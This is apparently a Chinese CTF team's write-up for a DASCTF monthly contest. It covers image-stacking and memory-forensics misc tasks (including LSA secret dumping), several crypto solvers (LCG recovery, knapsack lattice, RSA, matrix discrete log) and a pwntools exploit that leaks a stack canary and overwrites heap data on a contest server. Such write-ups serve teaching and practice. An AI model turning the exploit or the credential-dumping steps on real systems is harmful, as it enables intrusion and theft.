队伍名称
TeamGipsy战队
排名
9名
解题思路
MISC: 七仙女下凡、Dink Kirby PC
Crypto: easy_hash、LLLCCCGGG、easyRSA、Matrix
PWN:签个到
MISC
七仙女下凡(赛后复现)
题目很简单,但是因为一直在看取证,没看这个,加上做的时候可能有问题,就没出了,呜呜。
原本7张图,图都是一模一样的,好像区别就是宽高不一样
日常打开属性观察一下
从1-7,他的宽跟高的其中一部分都是翻倍的,stegsolve有一个水平交错跟垂直交错,跟这个一样,就尝试去搞
然后一直叠加到最后一个,保存出来,看一下通道,在0通道看到很明显的异常
导出,是jpg,转一下后缀,得到flag
赛中可能是哪一步没加上去,导致出问题了,猜测是叠加的顺序问题?用叠加出来的那张图去跟n.png原图叠加,跟用n.png去跟叠加出来的图叠加会不一样?
Dink Kirby PC(赛后复现)
最后找到AES密文是非预期,正解还不会。
题目了两个hintComputer Password Hint + Zipfile to decrypt encryptfile
hashdump出来的hash解不出来,就用lsadump(从注册表中提取LSA密钥信息(已解密))
得到一个key
然后在桌面上有一个hint.txt,在document下有一个加密的压缩包,hint.txt提示clip,就去看看clipboard,但是这个信息一直没用上,猜测是跟aes密文的地方有关
他这个意思如果我没猜错的话,是他把password的hint跟密文放在一块了,应该是跟lsa秘钥的地方在一起或者跟上面找到的压缩包的地方有关,但是我找了一天还是没找到,太菜了。
压缩包的密码就是之前的LSA密钥信息,得到一个密文
tr跟y都是换表,异或就是异或,其他就没啥了,很简单写个脚本
import string
string1='0123456789'
string2='8195376024'
string3=string.digits+string.ascii_lowercase
string4=string.ascii_lowercase+string.digits
x=x.translate(str.maketrans(string2,string1))
flag=''
for i in range(0,len(x),2):
flag+=chr(int(x[i:i+2])^0x31)
flag=flag.translate(str.maketrans(string3,string4))
print(flag)
#ead803812f23
得到key
最后密文,因为他给我的这个key是用网站加密的aes的key,(因为正经aes加密的秘钥长度不是12长),然后用网页加密的aes的开头盐值是固定的
加密网站(https://www.sojson.com/encrypt_aes.html)
开头都是固定的U2Fsd,然后就可以直接在16进制中搜索这个数据,就找到了,注意点的是数据在里面存储的形式是中间有个空的,所以搜索
就找到啦55 00 32 00 46 00 73 00 64
很没有意思呜呜,期待正解
然后解密就是flag了,工具是啥应该不用交了吧,ENCRYPPTO
CRYPTO
easy_hash
根据 函数,已知 ,可以求出 ;已知 ,可以求出 ;
根据 函数,因为 的位数小于 位,所以 就是 各个部分和其 拼接后的结果,把 验证的结果去掉就是
from Crypto.Util.number import long_to_bytes
a1, secret1 = [1768672211043417187765307394749760760531160781992300779145800061219666992833602547480090118225665457075744297987672863699370162614965380859290914620736, 89139545215288033432210221492974990584987914397112840989583439688211128705545477536596587262069032020212762581490561288493533363888589066045095054475929099275247145877699370608950340925139625068446642116123285918461312297390611577025368805438078034230342490499137494400676347225155752865648820807846513044723]
a2 = myhash(a1)
a3 = myhash(a2)
a = [0, a1, a2, a3]
a0 = (secret1 - (a[1] * a[1] + a[2] * a[1] ** 2 + a[3] * a[1] ** 3)) % P
a[0] = a0
flag = long_to_bytes(a0)
print(flag)
# b'DAxd4x17xe9xf8SCTF{th1x98xf8xa5$s_is_theSx83xbfxc9_fe3st_qx8fxa9xd4xacuest1on}x07.Bxce'
# DASCTF{th1s_is_the_fe3st_quest1on}
DASCTF{th1s_is_the_fe3st_quest1on}
LLLCCCGGG
CVE库yyds!
a = getPrime(300)
b = getPrime(300)
n = getPrime(300)
output = []
for i in range(10):
seed = (a * seed + b) % n
output.append(seed)
:已知求 求 ,跑脚本即可
from math import gcd
from sage.all import GF
from sage.all import is_prime_power
def attack(y, m=None, a=None, c=None):
"""
Recovers the parameters from a linear congruential generator.
If no modulus is provided, attempts to recover the modulus from the outputs (may require many outputs).
If no multiplier is provided, attempts to recover the multiplier from the outputs (requires at least 3 outputs).
If no increment is provided, attempts to recover the increment from the outputs (requires at least 2 outputs).
:param y: the sequential output values obtained from the LCG
:param m: the modulus of the LCG (can be None)
:param a: the multiplier of the LCG (can be None)
:param c: the increment of the LCG (can be None)
:return: a tuple containing the modulus, multiplier, and the increment
"""
if m is None:
assert len(y) >= 4, "At least 4 outputs are required to recover the modulus"
for i in range(len(y) - 3):
d0 = y[i + 1] - y[i]
d1 = y[i + 2] - y[i + 1]
d2 = y[i + 3] - y[i + 2]
g = d2 * d0 - d1 * d1
m = g if m is None else gcd(g, m)
assert is_prime_power(m), "Modulus must be a prime power, try providing more outputs"
gf = GF(m)
if a is None:
assert len(y) >= 3, "At least 3 outputs are required to recover the multiplier"
x0 = gf(y[0])
x1 = gf(y[1])
x2 = gf(y[2])
a = int((x2 - x1) / (x1 - x0))
if c is None:
assert len(y) >= 2, "At least 2 outputs are required to recover the multiplier"
x0 = gf(y[0])
x1 = gf(y[1])
c = int(x1 - a * x0)
return m, a, c
output = [75581294523880849612962675076574164955427439308298754836702542570856707873339581806556114, 85105032146983524265511965363979041936757881362506442483720291395014453678757599185295866, 1135521205967352800446368309480529634045225881261100886117662161359310082444102071893527191, 668602662320826002160475166323016971968419541611162501120982012317608523771962990634779874, 649673553234341629614052928960182629959348742983379959653724041939165898600067312959677865, 785853955591839090537858092210736716046894245185520583713505441606094906159642640920286905, 937799570303158165818350743257433287791556030352377438071495081189542968310256239806349207, 734514754865608924980327625447363286114899547828404532253101460271494241963897226149955073, 1106313725444442262780946046218124519471559148520571880678416934586056489046936771811070897, 8768152099561586039808874499029856564696410477579827751292882367683300035228537162519939]
print(attack(output))
# (1173843879841082693992136920285611943911704883357670151773674151308242415515507752596457609, 593647117401772145190396579663594527776190617014037091059262174448140362779813488948389210, 373193072645905805099743175375621363982796594540597615382605580257091541576660161082581472)
n = getPrime(256)
a = [getPrime(256)]
for i in range(1, len(key)):
a.append(a[i - 1] * 2)
b = getPrime(256)
m = []
for i in range(len(key)):
m.append((a[i] * b) % n)
s = 0
for i in range(len(key)):
s += m[i] * int(key[i])
seed = s
背包加密:给了 求 ,也是跑脚本
import os
import sys
from math import ceil
from math import log2
from math import sqrt
from sage.all import QQ
from sage.all import matrix
path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(os.path.abspath(__file__)))))
if sys.path[1] != path:
sys.path.insert(1, path)
from shared.lattice import shortest_vectors
def attack(a, s):
"""
Tries to find e_i values such that sum(e_i * a_i) = s.
This attack only works if the density of the a_i values is < 0.9048.
More information: Coster M. J. et al., "Improved low-density subset sum algorithms"
:param a: the a_i values
:param s: the s value
:return: the e_i values, or None if the e_i values were not found
"""
n = len(a)
d = n / log2(max(a))
N = ceil(1 / 2 * sqrt(n))
assert d < 0.9408, f"Density should be less than 0.9408 but was {d}."
L = matrix(QQ, n + 1, n + 1)
for i in range(n):
L[i, i] = 1
L[i, n] = N * a[i]
L[n] = [1 / 2] * n + [N * s]
for v in shortest_vectors(L):
s_ = 0
e = []
for i in range(n):
ei = 1 - (v[i] + 1 / 2)
if ei != 0 and ei != 1:
break
ei = int(ei)
s_ += ei * a[i]
e.append(ei)
if s_ == s:
return e
# from Crypto.Util.number import inverse
# n,a,b = (1173843879841082693992136920285611943911704883357670151773674151308242415515507752596457609, 593647117401772145190396579663594527776190617014037091059262174448140362779813488948389210, 373193072645905805099743175375621363982796594540597615382605580257091541576660161082581472)
# a += n
# b += n
# seed = (output[0] - b) * inverse(a,n) % n
seed = 3521860349748519290898711091955310441882843724537073169429818749700115765292362
m= [72110328606337761986452574632319920368225905906258123752738204764660440229296, 54011682421724526639264309053337133761455956763651742732220904522794415369243, 17814390052498055944887777895371560547916058478438980691186304039062365649137, 35628780104996111889775555790743121095832116956877961382372608078124731298274, 71257560209992223779551111581486242191664233913755922764745216156249462596548, 52306145629033450225461382951669777408332612778647340756234927305972460103747, 14403316467115903117281925692036847841669370508430176739214349605418455118145, 28806632934231806234563851384073695683338741016860353478428699210836910236290, 57613265868463612469127702768147391366677482033720706956857398421673820472580, 25017556945976227604614565324992075758359109018576909140459291836821175855811, 50035113891952455209229130649984151516718218037153818280918583673642351711622, 9861252992953913084817421088665596058440581025443131788581662340758238333895, 19722505985907826169634842177331192116881162050886263577163324681516476667790, 39445011971815652339269684354662384233762324101772527154326649363032953335580, 78890023943631304678539368709324768467524648203545054308653298726065906671160, 67571073096311612023437897207346829960053441358225603844051092445605348252971, 44933171401672226713234954203390952945111027667586702914846679884684231416593, 89866342803344453426469908406781905890222055335173405829693359769368462833186, 89523710815737909519298976602261104805448255621482306886131214532210460577023, 88838446840524821704957112993219502635900656194100108999006924057894456064697, 87467918890098646076273385775136298296805457339335713224758343109262447040045, 84726862989246294818905931338969889618615059629806921676261181211998428990741, 79244751187541592304171022466637072262234264210749338579266857417470392892133, 68280527584132187274701204721971437549472673372634172385278209828414320694917, 46352080377313377215761569232640168123949491696403839997300914650302176300485, 2495185963675757097882298253977629272903128343943175221346324294077887511621, 4990371927351514195764596507955258545806256687886350442692648588155775023242, 9980743854703028391529193015910517091612513375772700885385297176311550046484, 19961487709406056783058386031821034183225026751545401770770594352623100092968, 39922975418812113566116772063642068366450053503090803541541188705246200185936, 79845950837624227132233544127284136732900107006181607083082377410492400371872, 69482926884297456930826248043265566490804358963498709392909249814458335654395, 48756878977643916528011655875228426006612862878132914012562994622390206219441, 7304783164336835722382471539154145038229870707401323251870484238253947349533, 14609566328673671444764943078308290076459741414802646503740968476507894699066, 29219132657347342889529886156616580152919482829605293007481936953015789398132, 58438265314694685779059772313233160305838965659210586014963873906031578796264, 26667555838438374224478704415163613636682076269556667256672242805536692503179, 53335111676876748448957408830327227273364152539113334513344485611073385006358, 16461248562802499564273977449351747571732450029362164253433466215620304923367, 32922497125604999128547954898703495143464900058724328506866932431240609846734, 65844994251209998257095909797406990286929800117448657013733864862481219693468, 41481013711468999180550979383511273598863745186032809254212224718435974297587, 82962027422937998361101958767022547197727490372065618508424449436871948595174, 75715080054924999388563077322742387420459125695266732243593393867217432100999, 61221185318899001443485314434182067865922396341668959713931282727908399112649, 32233395846847005553329788657061428756848937634473414654607060449290333135949, 64466791693694011106659577314122857513697875268946829309214120898580666271898, 38724608596437024879678314416943008052399895489029153845172736790634867454447, 77449217192874049759356628833886016104799790978058307690345473581269734908894, 64689459594797102185072417456469325234603726907252110607435442156013004728439, 39169944398643207036503994701635943494211598765639716441615379305499544367529, 78339888797286414073007989403271886988423197531279432883230758610999088735058, 66470802803621830812375138595241067001850540013694360993206012215471712380767, 42732630816292664291109436979179427028705224978524217213156519424416959672185, 85465261632585328582218873958358854057410449957048434426313038848833919344370, 80721548474219659830796907705415001139825044865232364079370572691141373599391, 71234122157488322327952975199527295304654234681600223385485640375756282109433, 52259269524025647322265110187751883634312614314335941997715775744986099129517, 14309564257100297310889380164201060293629373579807379222176046483445733169685, 28619128514200594621778760328402120587258747159614758444352092966891466339370, 57238257028401189243557520656804241174517494319229516888704185933782932678740, 24267539265851381153474201102305775374039133589594529004152866861039400268131, 48535078531702762306948402204611550748078267179189058008305733722078800536262, 6861182272454527280255964197920394521160679309513611243355962437631135983175, 13722364544909054560511928395840789042321358619027222486711924875262271966350, 27444729089818109121023856791681578084642717238054444973423849750524543932700, 54889458179636218242047713583363156169285434476108889946847699501049087865400, 19569941568321439150454586955423605363575013903353275120439893995571710641451, 39139883136642878300909173910847210727150027806706550240879787991143421282902, 78279766273285756601818347821694421454300055613413100481759575982286842565804, 66350557755620515869995855432086135933604256177961696190263646958047220042259, 42492140720290034406350870652869564892212657307058887607271788909567974995169, 84984281440580068812701741305739129784425314614117775214543577819135949990338, 79759588090209140291762642400175552593854774179371045655831650631745434891327, 69310201389467283249884444589048398212713693309877586538407796256964404693305, 48411427987983569166128048966794089450431531570890668303560087507402344297261, 6613881185016140998615257722285471925867208092916831833864670008278223505173, 13227762370032281997230515444570943851734416185833663667729340016556447010346, 26455524740064563994461030889141887703468832371667327335458680033112894020692, 52911049480129127988922061778283775406937664743334654670917360066225788041384, 15613124169307258644203283345264843838879474437804804568579215125925110993419, 31226248338614517288406566690529687677758948875609609137158430251850221986838, 62452496677229034576813133381059375355517897751219218274316860503700443973676, 34696018563507071819985426550816043736039940453573931775378216000874422858003, 69392037127014143639970853101632087472079880907147863550756432001748845716006, 48575099463077289946300865991961467969163906765431222328257358996971226342663, 6941224135203582558960891772620228963331958481997939883259212987415987595977, 13882448270407165117921783545240457926663916963995879766518425974831975191954, 27764896540814330235843567090480915853327833927991759533036851949663950383908, 55529793081628660471687134180961831706655667855983519066073703899327900767816, 20850611372306323609733428150620956438315480663102533358891902792129336446283, 41701222744612647219466856301241912876630961326205066717783805584258672892566, 83402445489225294438933712602483825753261922652410133435567611168517345785132, 76595916187499591544226584993664944531527990255955762097879717330508226480915, 62982857584048185754812329776027182088060125463047019422503929654489987872481, 35756740377145374175983819340751657201124395877229534071752354302453510655613, 71513480754290748351967638681503314402248791754459068143504708604907021311226, 52817986717630499370294437151703921829501728460053631513753912203287577533103, 15426998644310001406948034092105136684007601871242758254252319400048689976857, 30853997288620002813896068184210273368015203742485516508504638800097379953714, 61707994577240005627792136368420546736030407484971033017009277600194759907428, 33207014363529013921943432525538386497064959921077561260763050193863054725507, 66414028727058027843886865051076772994129919842155122521526100387726109451014, 42619082663165058354132889890850839013263984635445740269796695768925753812679, 85238165326330116708265779781701678026527969270891480539593391537851507625358, 80267355861709236082890719352100649078060083492918456305931278069176550161367, 70325736932467474832140598492898591181124311936972407838607051131826635233385, 50442499073983952330640356774494475387252768825080310903958597257126805377421, 10676023357016907327639873337686243799509682601296117034661689507727145665493, 21352046714033814655279746675372487599019365202592234069323379015454291330986, 42704093428067629310559493350744975198038730405184468138646758030908582661972, 85408186856135258621118986701489950396077460810368936277293516061817165323944, 80607398921319519908597133191677193817159066571873367781331527117107865558539, 71005823051688042483553426172051680659322278094882230789407549227689266027729, 51802671312425087633466012132800654343648701140899956805559593448852066966109, 13396367833899177933291184054298601712301547232935408837863681891177668842869, 26792735667798355866582368108597203424603094465870817675727363782355337685738, 53585471335596711733164736217194406849206188931741635351454727564710675371476, 16961967880242426132688632223086106723416522814618765929653950122894885653603, 33923935760484852265377264446172213446833045629237531859307900245789771307206, 67847871520969704530754528892344426893666091258475063718615800491579542614412, 45486768250988411727868217573386146812336327468085622663976095976632620139475, 764561711025826122095594935469586649676799887306740554696686946738775189601, 1529123422051652244191189870939173299353599774613481109393373893477550379202, 3058246844103304488382379741878346598707199549226962218786747786955100758404, 6116493688206608976764759483756693197414399098453924437573495573910201516808, 12232987376413217953529518967513386394828798196907848875146991147820403033616, 24465974752826435907059037935026772789657596393815697750293982295640806067232, 48931949505652871814118075870053545579315192787631395500587964591281612134464, 7654924220354746294595311528804384183634530526398286227920424176036759179579, 15309848440709492589190623057608768367269061052796572455840848352073518359158, 30619696881418985178381246115217536734538122105593144911681696704147036718316, 61239393762837970356762492230435073469076244211186289823363393408294073436632, 32269812734724943379884144249567439963156633373508074873471281810061681783915, 64539625469449886759768288499134879926313266747016149746942563620123363567830, 38870276147948776185895736786967052877630678445167794720629622233720262046311, 77740552295897552371791473573934105755261356890335589441259244467440524092622, 65272129800844107409942106936565504535526858731806674109262983928354583095895, 40335284810737217486243373661828302096057862414748843445270462850182701102441, 80670569621474434972486747323656604192115724829497686890540925700365402204882, 71132164451997872611332654436010501409235594610130869007826346394204339320415, 52055354113044747889024468660718295843475334171397233242397187781882213551481, 13901733435138498444408097110133884711954813293929961711538870557237962013613, 27803466870276996888816194220267769423909626587859923423077741114475924027226, 55606933740553993777632388440535538847819253175719846846155482228951848054452, 21004892690156990221623936669768370720642651302575188919055459451377231019555, 42009785380313980443247873339536741441285302605150377838110918902754462039110, 84019570760627960886495746679073482882570605210300755676221837805508924078220, 77830166730304924439350653146844258790145355371737006579188170604491383067091, 65451358669658851545060466082385810605294855694609508385120836202456301044833]
print(attack(m,seed))
# [1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1]
state = int(key, 2)
a = getPrime(256)
b = getPrime(256)
c = getPrime(256)
for _ in range(10 ** 10000):
state = (a * state + b) % c
flag = b'****************************************'
state_md5 = hashlib.md5(str(state).encode()).hexdigest()
xorflag = xor(flag, state_md5).hex()
矩阵快速幂: 次循环,搞一个矩阵快速幂即可
# sagemath
import hashlib
from Crypto.Util.number import long_to_bytes, bytes_to_long
key = [1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1,
1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1,
1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1,
1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1]
a = 102146678855348749881681741830301892566150942749854546938156269348575567682569
b = 57926598868103510549704115342815226386495366694945712679089221082045615713293
c = 79112540456632613121737537841885533313599936328220061653608162113976717833173
xorflag = 0x2079677330734e7d07116d73543d03316c6501555c02403b7201080612101049
state = int(''.join([str(i) for i in key]), 2)
A = matrix(Zmod(c), [[a, 1], [0, 1]])
B = vector(Zmod(c), [state, b])
state = int((A ^ (10 ** 10000) * B)[0])
# state = 5413978693489756582509930284917854732906886271552898511650182850401353715151
state_md5 = hashlib.md5(str(state).encode()).hexdigest()
state_md5 = bytes_to_long(state_md5.encode())
print(long_to_bytes(state_md5 ^^ xorflag))
# b'DASCTF{D0u_Ge_1S_R4al1y_G00d!!!}'
DASCTF{D0u_Ge_1S_R4al1y_G00d!!!}
easyrsa
先分解 ,网站(https://www.alpertron.com.ar/ECM.HTM)分解,或是 分解
然后 的 用基底转化分解(哪个是 ,哪个是 ,都可以试一试)
最后有限域开方求
from gmpy2 import *
from Crypto.Util.number import *
n = 86073852484226203700520112718689325205597071202320413471730820840719099334770
n2 = 77582485123791158683121280616703899430016469065264033598472741751344256774648355531493586310864150337351815051848231793841751148287075688226384710343269278032576253497728407800522536152937473072438970839941923618053297480433385258911357458745700958378269978384670108026994918504237309072908971746160378531040480539649223970964653553804442759847964633088481940435582792404175653758785321463055628690804551479982557193366035172983893595403859872458966844805671311011033726279121149599533093604586152158331657286488305064843651636225644328162652701896037366058322959361248649656784810609391313
c = 260434870216758498838321584935711394249835963213639852217120194663627852693180232036075839403208332707552953757185774603238436545434522971149891312380970896040823539050341723863717581297624370198483155582245220695123793458717418658539983101802256991837534210806768587736557644192367876024337837658337683388449336720569707094997412847022794461117019613124291022681935875774139147643806772608929174881451749463825639214096129554621195116737322890163556732291246108250543079041977037626755130422879778449546701988814607595746282148723362288451970833214072743929855505520539885650891349827459470540263153862109871050950881032032388185414677989393461533362690744724752363346530211163516319373099647590952338730
e = 7
# p1,q = two_squares(n)
p1 = 200170033707580057053975766783012322797
q = 214489650309129059054871357172058931331
q = q + 63066105847160076051036559850646146794
base = q
polynomial = 0
var('x')
for i, e in enumerate(ZZ(n2).digits(base)):
polynomial += e * x ** i
res = polynomial.factor_list()
primes = []
for r in res:
f = r[0]
primes.append(f(base))
p = int(primes[0])
q = int(primes[1])
r = int(primes[2])
while True:
p1 = next_prime(p1)
p = next_prime(p)
q = next_prime(q)
r = next_prime(r)
if (p - 1) % 7 == 0 and (q - 1) % 7 == 0 and (r - 1) % 7 == 0 and (p1 - 1) % 7 == 0:
break
n3 = p1 ** 3 * p * q * r
PR.<x> = Zmod(p)[]
f = x^7 - c
res = f.roots()
for i in res:
if b'DASCTF' in long_to_bytes(int(i[0])):
print(long_to_bytes(int(i[0])))
# b'DASCTF{I_d0nt_kn0w_wh@t_i_w@nt_t0_d0_ju3t_d0_it_attack_we@k_prim4!!!}'
DASCTF{I_d0nt_kn0w_wh@t_i_w@nt_t0_d0_ju3t_d0_it_attack_we@k_prim4!!!}
Matrix
赛后出,跑了50多分钟
思路清晰,就是矩阵上的离散对数,用 算法可出,照着 佬博客的脚本一通乱改,勉强能用。
import tqdm
import hashlib
def babystep_giantstep(g, y, p):
m = int((p-1)**0.5 + 0.5)
table = {}
gr = list(matrix(Zmod(P), len(g[0])))
for i in range(len(g[0])):
gr[i][i] = 1
gr = matrix(Zmod(P), gr)
for r in tqdm.tqdm(range(m)):
table[str(gr)] = r
gr = g * gr
gm = g ^ (-m)
ygqm = y
for q in tqdm.tqdm(range(m)):
if str(ygqm) in table:
print(q * m + table[str(ygqm)], p)
return q * m + table[str(ygqm)]
ygqm = ygqm * gm
return None
def pohlig_hellman_DLP(g, y, p):
crt_moduli = []
crt_remain = []
for q, _ in factor(p-1):
x = babystep_giantstep(g^(int((p-1)//q)), y^(int((p-1)//q)), q)
if (x is None) or (x <= 1):
continue
crt_moduli.append(q)
crt_remain.append(x)
x = crt(crt_remain, crt_moduli)
return x
p = 12143520799543738643
P = p
A = [[12143520799533590286, 1517884368, 12143520745929978443, 796545089340, 12143514553710344843, 28963398496032, 12143436449354407235, 158437186324560, 12143329129091084963, 144214939188320, 12143459416553205779, 11289521392968],
[12143520799533124067, 1552775781, 12143520745442171123, 796372987410, 12143514596803995443, 28617862048776, 12143437786643111987, 155426784993480, 12143333265382547123, 140792203111560, 12143460985399172467, 10983300063372],
[12143520799533026603, 1545759072, 12143520746151921286, 781222462020, 12143514741528175043, 27856210942560, 12143440210529480891, 150563969013744, 12143339455702534403, 135941365971840, 12143463119774571623, 10579745342712],
[4857408319806885466, 2428704161425648657, 12143520747462241175, 758851601758, 12143514933292307603, 7286139389566980165, 9714738936567334300, 144947557513044, 12143346444338047691, 130561054163540, 4857352974113333366, 2428714303424782417],
[12143520799533339320, 1476842796, 12143520749060275613, 733281428880, 12143515144091549812, 25896324662208, 12143446129977471347, 139126289668080, 12143353609086952433, 125093278125816, 12143467808884068695, 9705993135696],
[3469577371288079926, 5204366058378782250, 12143520750775862343, 706665985740, 12143515359139397843, 24876891455539, 12143449149385190675, 5204499435641729607, 1734628523990131469, 119757210113970, 12143470097256549947, 9282407958928],
[10986995009101166671, 1734788687033207505, 12143520752514668698, 680173911560, 12143515570582515443, 23883386182656, 12143452072344092516, 10408859957710764174, 8673790006740000925, 4047954924507284041, 12143472277719610437, 8879790035168],
[12143520799534210329, 8095680534365818753, 12143520754224346525, 6071761054204856029, 12143515774342357443, 22931775530664, 12143454859049102627, 122586336122081, 12143373761302849103, 109840689548590, 8095634066844843878, 8500892291801],
[2428704159899526175, 7286112481016467893, 12143520755876491019, 629765964828, 12143515968446948123, 9714838668887734012, 4857345013259425502, 117630592711632, 12143379764863568374, 105318302849760, 2428659620509049335, 7286120625945355053],
[7286112479717322389, 7286112480971640825, 12143520757456628435, 606320684970, 12143516152115449139, 4857429497934652454, 4857347490735050126, 112978994964264, 12143385390297217523, 101086824360217, 7286069740980100293, 7286120294834973633],
[7727695054246476847, 1202487728, 12143520758958480293, 584144077140, 12143516325240923843, 20377952745696, 12143462294760579275, 108622249048560, 12143390651947217363, 97133513961120, 12143479741445599772, 8831658996900830432],
[12143520799535388887, 1161628182, 12143520760380594623, 563225247585, 12143516488091679443, 19626876325056, 12143464472820678035, 104545135017180, 12143395570399006523, 93441517429260, 12143481309754543787, 7218375794633]]
enc = [[6218417900726690014, 9327172375980932592, 4153527959371790237, 132501760371295655, 7299109180510132427, 1648440321256276927, 10254693889934546668, 4725557258212165861, 202540954318317287, 9982016014873956804, 12039778149630734734, 9041012188688166860], [3076804875574387393, 10302499316575177148, 6883027490395277833, 10878965853169213290, 9440772171285517930, 793484497395967159, 3203070038396226958, 3243524965914218040, 10903462885339873262, 6328127784146872505, 3582866063885730405, 7656522484723054646], [6760440055042602927, 150299808832813166, 8106927197068158588, 3568136066830207645, 1915695218154982134, 11420119896639238238, 4976062871832376425, 5853866011790802336, 2581655278311379827, 10329181983489200369, 11095959626942470743, 3321403548342671501], [6989296053899761245, 8000749793706207705, 3809964528725899038, 4265030375240040581, 8089437371864148142, 5053064810412901554, 6501938965780936220, 10980028692407817118, 1863994316213089323, 8802681688697262113, 11477364106737785286, 3974421463550032713], [564344169406003662, 10724528903365710678, 10337956806430136031, 2024700528402916143, 11872118105346920062, 6838139960468687332, 2511372139663339351, 704113312599525196, 3251401730670339537, 10799465026599377540, 8770053125971443972, 6814688868085941116], [3520978035324296134, 5828225067833111657, 9070639660343598399, 566393201097489131, 7135313009663503048, 12051739882139705242, 1250122561645263412, 8926361503228079288, 1824549628801039352, 2820357879648474411, 10688580232568249253, 2688980806680871259], [5664448213737495613, 2454324330766153188, 9301881451933430336, 3021484798573229472, 8271546929364126837, 7678973012480737958, 9191201408409357883, 11850313540574789398, 9524210559263349425, 10585572460443926001, 7222517189955148361, 11305799364557617365], [10461986521764931850, 5752221957033325066, 2329192457304812250, 7045570806888107634, 3107570932863726810, 8394731797841115111, 9099090649026739137, 9624140552706688612, 3502511045385838990, 3708709186460615427, 1380093196284505784, 6602173655057694105], [1628309316322170753, 8386682411272881459, 463052945030722337, 3094940575624695048, 9530557699190097735, 1189223359914307451, 95193999334854086, 9341511963235067451, 6499604981217622391, 11490873719281743251, 5788517522054066633, 6458318206067819330], [10262011543342924955, 10077405855258558051, 10534972018308857652, 7315712994565818330, 10727209214692737176, 38582499997230642, 7524643012491815390, 692052671905385931, 839117674622565504, 3738047667125884979, 3518017017084862562, 8345863842327754628], [2124572295600479486, 4109858666604779750, 8841167859692695947, 7527947761152890553, 5299879731039341554, 4012836051669960233, 11962255964799745220, 401093546211622697, 5086394577875124600, 836158269929849554, 8396307845611866890, 2005411230628730963], [6960829097328848685, 7974906431099851239, 11577910301734480466, 12134540342063390442, 4130839186501336093, 2878999232538232129, 8815211529803293482, 5165433981826992396, 10462641014399297415, 6335190222647425343, 1593313890583893142, 6411592929118677856]]
A = matrix(Zmod(p),A)
enc = matrix(Zmod(p),enc)
y = pohlig_hellman_DLP(A, enc, p)
x = lcm(lcm(229,593),1944001580291) # crt_moduli中的元素
y = 86353340462193003
for i in range(10000):
if x * i + y < p:
if A ^ (x * i + y) == enc:
print('DASCTF{' + hashlib.md5(str(x * i + y).encode()).hexdigest() + '}')
else:break
直接跑出来的 ,不能直接用
要加上 倍
最后求出来 ,MD5一下即可
DASCTF{d7fd1e0d54aab17195f2e80e0d0cefbc}
PWN
签个到
pwn师傅太懒,就给了个∠本
#encoding: utf-8
#!/usr/bin/python
from pwn import*
import sys
#context.log_level = "debug"
context.arch="amd64"
binary_name = "pwn"
ld_name = "ld"
local = 1
elf =ELF("./"+binary_name)
#ld = ELF("./"+ld_name)
se = lambda data :io.send(data)
sa = lambda delim,data :io.sendafter(delim, data)
sl = lambda data :io.sendline(data)
sla = lambda delim,data :io.sendlineafter(delim, data)
rc = lambda num :io.recv(num)
rl = lambda :io.recvline()
ru = lambda delims :io.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, b'x00'))
uu64 = lambda data :u64(data.ljust(8, b'x00'))
info = lambda tag, addr :log.info(tag + " -------------> " + hex(addr))
ia = lambda :io.interactive()
if local==1:
io = remote("node4.buuoj.cn",27456)
else:
io = process("./"+binary_name)
def debug():
gdb.attach(io,'''
b *$rebase(0x014F7)
''')
pause()
def add(length,name):
sla(b"> ",b"1")
sla(b"length: ",str(length).encode())
sa(b"name: ",name)
def get(data):
sla(b"> ",b"2")
sa(b"data: ",data)
sa(b"who are u?",b"a"*9)
ru(b"a"*8)
canary = uu64(io.recv(8))-0x61
info("canary",canary)
add(0x0,b"a"*0x14+p64(0x0000000000020d51)+p32(canary&0xffffffff))
io.sendline()
add(0x8,p32((canary>>32)&0xffffffff)+b"aaaa")
get(p32((canary>>32)&0xffffffff)+b"aaaa")
# debug()
# sa(b"> ",b"2")
ia()
参考资料
加密网站: https://www.sojson.com/encrypt_aes.html
[2]
网站: https://www.alpertron.com.ar/ECM.HTM
往期推荐
第三届“祥云杯”网络安全大赛暨吉林省第五届大学生网络安全大赛部分WriteUp
DASCTF X GFCTF 2022十月挑战赛!部分WriteUp
原文始发于微信公众号(杭师大网安):DAS 11月月赛TeamGipsy战队 WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论